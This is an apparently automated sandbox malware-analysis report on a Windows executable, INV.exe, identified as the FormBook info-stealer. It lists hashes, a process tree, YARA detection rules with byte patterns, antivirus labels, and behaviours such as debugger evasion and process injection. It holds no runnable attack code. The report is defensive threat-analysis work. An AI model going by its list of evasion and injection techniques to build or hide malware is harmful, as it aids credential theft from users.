Analysis Report INV.exe

Overview

General Information

Sample Name: INV.exe
Analysis ID: 323458
MD5: 83259cb82642666503278233421c306d
SHA1: 180e81bab341eda0d404b8f5fed93bc3b350cfbd
SHA256: 6e28207e7a3ef7f173d7a7905208a55ff0ad1eb645241e2e9ae453c643cf3a31
Tags: exe

Detection

FormBook
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • INV.exe (PID: 7140 cmdline: 'C:\Users\user\Desktop\INV.exe' MD5: 83259CB82642666503278233421C306D)
    • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • INV.exe (PID: 1740 cmdline: C:\Users\user\Desktop\INV.exe MD5: 83259CB82642666503278233421C306D)
    • INV.exe (PID: 6348 cmdline: C:\Users\user\Desktop\INV.exe MD5: 83259CB82642666503278233421C306D)
      • INV.exe (PID: 2856 cmdline: C:\Users\user\Desktop\INV.exe MD5: 83259CB82642666503278233421C306D)
        • WerFault.exe (PID: 1868 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 872 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x1e940:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x1ebba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x2a6dd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x2a1c9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x2a7df:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x2a957:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x1f5d2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x29444:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x202cb:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x3054f:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x31552:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x2d471:$sqlite3step: 68 34 1C 7B E1
    • 0x2d584:$sqlite3step: 68 34 1C 7B E1
    • 0x2d4a0:$sqlite3text: 68 38 2A 90 C5
    • 0x2d5c5:$sqlite3text: 68 38 2A 90 C5
    • 0x2d4b3:$sqlite3blob: 68 53 D8 7F 8C
    • 0x2d5db:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x21b10:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x21d8a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x2d8ad:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x2d399:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x2d9af:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x2db27:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x227a2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x2c614:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x2349b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x3371f:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x34722:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      4.2.INV.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        4.2.INV.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x1ad40:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x1afba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x26add:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x265c9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x26bdf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x26d57:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x1b9d2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x25844:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1c6cb:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x2c94f:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x2d952:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.INV.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x29871:$sqlite3step: 68 34 1C 7B E1
        • 0x29984:$sqlite3step: 68 34 1C 7B E1
        • 0x298a0:$sqlite3text: 68 38 2A 90 C5
        • 0x299c5:$sqlite3text: 68 38 2A 90 C5
        • 0x298b3:$sqlite3blob: 68 53 D8 7F 8C
        • 0x299db:$sqlite3blob: 68 53 D8 7F 8C
        4.2.INV.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          4.2.INV.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x1e940:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x1ebba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x2a6dd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x2a1c9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x2a7df:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x2a957:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x1f5d2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x29444:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x202cb:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x3054f:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x31552:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Antivirus / Scanner detection for submitted sample
          Source: INV.exe, Avira: detected
          Yara detected FormBook
          Source: Yara match, File source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 4.2.INV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sample
          Source: INV.exe, Joe Sandbox ML: detected
          Source: 0.0.INV.exe.1060000.0.unpack, Avira: Label: ADWARE/MultiPlug.Gen7
          Source: 4.0.INV.exe.1060000.0.unpack, Avira: Label: ADWARE/MultiPlug.Gen7
          Source: 4.2.INV.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.INV.exe.1060000.0.unpack, Avira: Label: ADWARE/MultiPlug.Gen7
          Source: 2.2.INV.exe.1060000.0.unpack, Avira: Label: ADWARE/MultiPlug.Gen7
          Source: 3.2.INV.exe.1060000.0.unpack, Avira: Label: TR/Crypt.EPACK.Gen2
          Source: 0.2.INV.exe.1060000.0.unpack, Avira: Label: TR/Crypt.EPACK.Gen2
          Source: 4.2.INV.exe.1060000.1.unpack, Avira: Label: ADWARE/MultiPlug.Gen7
          Source: 3.0.INV.exe.1060000.0.unpack, Avira: Label: ADWARE/MultiPlug.Gen7
          Source: C:\Users\user\Desktop\INV.exe, Code function: 4_2_00404A29 FindFirstFileExW, 4_2_00404A29
          Source: C:\Users\user\Desktop\INV.exe, Code function: 4x nop then pop ebx, 0_2_01099E2B
          Source: C:\Users\user\Desktop\INV.exe, Code function: 4x nop then pop ebx, 3_2_01099E2B
          Source: INV.exe, 00000000.00000002.648809427.00000000012C8000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 4.2.INV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.2.INV.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.INV.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.2.INV.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.INV.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\INV.exe, Code function: String function: 010821A8 appears 46 times
          Source: C:\Users\user\Desktop\INV.exe, Code function: String function: 01085976 appears 36 times
          Source: C:\Users\user\Desktop\INV.exe, Code function: String function: 010627F0 appears 90 times
          Source: C:\Users\user\Desktop\INV.exe, Code function: String function: 010615FE appears 33 times
          Source: C:\Users\user\Desktop\INV.exe, Code function: String function: 010632A1 appears 81 times
          Source: unknown, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 872
          Source: INV.exe, 00000000.00000003.647727507.0000000002F0F000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs INV.exe
          Source: INV.exe, 00000003.00000003.649712453.00000000033FF000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs INV.exe
          Source: INV.exe, 00000004.00000002.728297427.0000000004E00000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs INV.exe
          Source: INV.exe, 00000004.00000002.728240140.0000000004D90000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamemscorrc.dllT vs INV.exe
          Source: C:\Windows\SysWOW64\WerFault.exe, Section loaded: sfc.dll
          Source: C:\Windows\SysWOW64\WerFault.exe, Section loaded: phoneinfo.dll
          Source: C:\Windows\SysWOW64\WerFault.exe, Section loaded: ext-ms-win-xblauth-console-l1.dll
          Source: C:\Windows\SysWOW64\WerFault.exe, Section loaded: ext-ms-win-xblauth-console-l1.dll
          Source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.INV.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.INV.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.INV.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.INV.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal72.troj.evad.winEXE@9/4@0/0
          Source: C:\Users\user\Desktop\INV.exeCode function: 4_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,4_2_00401489
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2856
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERD26.tmp
          Source: INV.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\INV.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\INV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: unknownProcess created: C:\Users\user\Desktop\INV.exe 'C:\Users\user\Desktop\INV.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exe
          Source: unknownProcess created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exe
          Source: unknownProcess created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 872
          Source: C:\Users\user\Desktop\INV.exeProcess created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exe
          Source: C:\Users\user\Desktop\INV.exeProcess created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exe
          Source: C:\Users\user\Desktop\INV.exeProcess created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exe
          Source: C:\Users\user\Desktop\INV.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: INV.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.658590255.0000000002FCA000.00000004.00000001.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.662352676.0000000004EE1000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.pdbx source: WerFault.exe, 00000007.00000003.661742223.0000000005180000.00000004.00000001.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.662352676.0000000004EE1000.00000004.00000001.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.662352676.0000000004EE1000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: INV.exe, 00000000.00000003.647077119.0000000002C60000.00000004.00000001.sdmp, INV.exe, 00000003.00000003.653597565.00000000032E0000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.658584638.0000000002FC4000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.662352676.0000000004EE1000.00000004.00000001.sdmp
          Source: Binary string: clr.pdb source: WerFault.exe, 00000007.00000003.662436848.0000000004FDE000.00000004.00000040.sdmp
          Source: Binary string: .ni.pdb source: WerFault.exe, 00000007.00000003.662359081.0000000004EF2000.00000004.00000001.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.662414796.0000000004FD0000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.662414796.0000000004FD0000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.662352676.0000000004EE1000.00000004.00000001.sdmp
          Source: Binary string: wwin32u.pdb7^ source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.662352676.0000000004EE1000.00000004.00000001.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb=^ source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.658722034.0000000002FCF000.00000004.00000001.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.662414796.0000000004FD0000.00000004.00000040.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000007.00000003.661742223.0000000005180000.00000004.00000001.sdmp, WERD26.tmp.dmp.7.dr
          Source: Binary string: oleaut32.pdb]^ source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: mscoree.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: crypt32.pdb;^ source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000007.00000003.658584638.0000000002FC4000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: wuser32.pdb)^ source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.662414796.0000000004FD0000.00000004.00000040.sdmp
          Source: Binary string: WLDP.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.662376905.0000000004FD1000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdbUGP source: INV.exe, 00000000.00000003.647077119.0000000002C60000.00000004.00000001.sdmp, INV.exe, 00000003.00000003.653597565.00000000032E0000.00000004.00000001.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000007.00000003.662436848.0000000004FDE000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
